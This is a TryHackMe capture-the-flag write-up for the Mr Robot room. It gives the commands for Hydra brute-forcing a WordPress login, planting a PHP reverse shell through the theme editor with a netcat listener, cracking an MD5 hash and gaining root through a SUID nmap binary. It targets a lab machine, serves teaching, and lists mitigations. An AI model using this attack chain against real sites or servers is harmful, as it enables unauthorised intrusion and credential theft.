Post

Mr Robot CTF

Enumerate services, scan TCP/UDP ports, exploit WordPress vulnerabilities, and escalate privileges to capture flags in this Mr. Robot-themed CTF.

Posted Updated
Preview Image
By Mustafa Eltayeb
3 min read
Mr Robot CTF

Mr Robot CTF - TryHackMe Writeup

Mr Robot CTF is a beginner-friendly CTF room inspired by the Mr. Robot TV series. This room focuses on web enumeration, WordPress exploitation, and Linux privilege escalation.

Difficulty: Easy ⭐
Operating System: Linux (Ubuntu)
Themes: Web Enumeration, WordPress, Password Cracking, SUID Privilege Escalation

Objectives

  1. Enumerate web services and discover hidden files
  2. Exploit WordPress authentication vulnerabilities
  3. Gain initial shell access
  4. Escalate privileges to root
  5. Capture all three flags

Reconnaissance

Nmap Scan

Started with a comprehensive port scan:

1

nmap -p- -sCV -oA MrRobot-Nmap 10.10.186.36

Results:

1
2
3
4
5
6

PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 8.2p1 Ubuntu 4ubuntu0.7
80/tcp  open  http     Apache httpd
|_http-title: Site doesn't have a title (text/html).
443/tcp open  ssl/http Apache httpd
|_http-title: Site doesn't have a title (text/html).

Key Findings:

  • Port 22: SSH service
  • Ports 80/443: Web servers running Apache

Web Enumeration

Directory Discovery with Gobuster

1

gobuster dir --url http://10.10.74.251 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt

Important Discoveries:

  • /robots - Contains flag hints and wordlist
  • /wp-login - WordPress login page
  • /readme - System information
  • /license - Licensing information
  • /phpmyadmin - Database administration (403 Forbidden)

Flag 1 Discovery

Accessed /robots.txt:

Robots.txt Content

Contents:

1
2
3
4
5
6

User-agent: *
Disallow: /wp-admin/
Disallow: /wp-login/
Disallow: /readme.html
Disallow: /license.txt
Disallow: /key-1-of-3.txt

Flag 1 Captured:
Accessed /key-1-of-3.txt to obtain the first flag.

Additional Discovery:
Found fsocity.dic - A wordlist file that would be useful for brute-force attacks.

WordPress Discovery

Found WordPress login page at /wp-login.php:

WordPress Login

Initial Access

Username Enumeration

Used Hydra to enumerate valid usernames:

1

hydra -L fsocity.dic -p test 10.10.186.36 http-post-form "/wp-login.php:log=^USER^&pwd=^PWD^:Invalid username" -t 30

Result: Found username Elliot

Password Brute-Force

1

hydra -l Elliot -P fsocity.dic 10.10.186.36 http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^:The password you entered for the username" -t 30

Credentials Found:

  • Username: Elliot
  • Password: ER28-0652

WordPress Admin Access

Logged into WordPress dashboard with discovered credentials.

Reverse Shell Deployment

  1. Navigate to Theme Editor:
    • Appearance → Editor → 404.php

  2. Insert PHP Reverse Shell: Used PentestMonkey PHP Reverse Shell

    Theme Editor

  3. Start Listener:
    1

    nc -nlvp 9999
  4. Trigger Shell: Accessed a non-existent page to trigger the 404 template

Shell Obtained

1

uid=1(daemon) gid=1(daemon) groups=1(daemon)

Lateral Movement

User Enumeration

1
2

ls /home
# Output: robot

Credential Discovery

Found in /home/robot:

1
2
3

cd /home/robot
ls
# Output: key-2-of-3.txt  password.raw-md5

MD5 Hash Content:

1

robot:c3fcd3d76192e4007dfb496cca67e13b

Password Cracking

1

john --wordlist=/usr/share/wordlists/rockyou.txt --format=Raw-MD5 hash.txt

Password Found: abcdefghijklmnopqrstuvwxyz

User Switch

1
2

su robot
Password: abcdefghijklmnopqrstuvwxyz

Flag 2 Capture

1
2

python -c 'import pty; pty.spawn("/bin/bash")'
cat key-2-of-3.txt

Flag 2 Captured

Privilege Escalation

SUID Binary Enumeration

1

find / -perm -u=s -type f 2>/dev/null

Notable Finding:

1

/usr/local/bin/nmap

Nmap SUID Exploitation

Referenced GTFOBins Nmap:

GTFOBins Reference

Exploitation:

1
2
3
4

nmap --interactive
nmap> !sh
whoami
# Output: root

Flag 3 Capture

1

cat /root/key-3-of-3.txt

Flag 3 Captured

Key Takeaways

Attack Path Summary:

1
2
3
4
5

Port Scanning → Web Enumeration → Robots.txt Discovery → 
WordPress Login → Hydra Brute-Force → WordPress Admin Access → 
Theme Editor Exploit → Reverse Shell → Credential Discovery → 
Password Cracking → User Switch → SUID Enumeration → 
Nmap Exploitation → Root Access

Vulnerabilities Exploited:

  1. Information Disclosure - Sensitive files in robots.txt
  2. Weak Password Policy - Crackable MD5 hash
  3. WordPress Misconfiguration - Theme editor access
  4. SUID Misconfiguration - Nmap with SUID permissions

Mitigation Strategies:

  1. For WordPress Security:
    • Disable theme/plugin editor
    • Implement strong password policies
    • Limit login attempts
    • Regular security updates
  2. For Linux Security:
    • Regular SUID binary audits
    • Principle of least privilege
    • Secure credential storage
    • Regular system updates
  3. For Web Security:
    • Restrict sensitive file access
    • Implement proper robots.txt
    • Regular security assessments
    • Input validation and sanitization

Tools Used:

  • Nmap - Port scanning
  • Gobuster - Directory enumeration
  • Hydra - Password brute-forcing
  • JohnTheRipper - Password cracking
  • GTFOBins - Privilege escalation reference
  • Netcat - Reverse shell handling

Find me online:
• TryHackMe: t4t4r1s
• LinkedIn: Mustafa Altayeb
• X: @mustafa_altayeb

tryhackme
TryHackMe WordPress CTF Privilege Escalation Nmap SUID
This post is licensed under CC BY 4.0 by the author.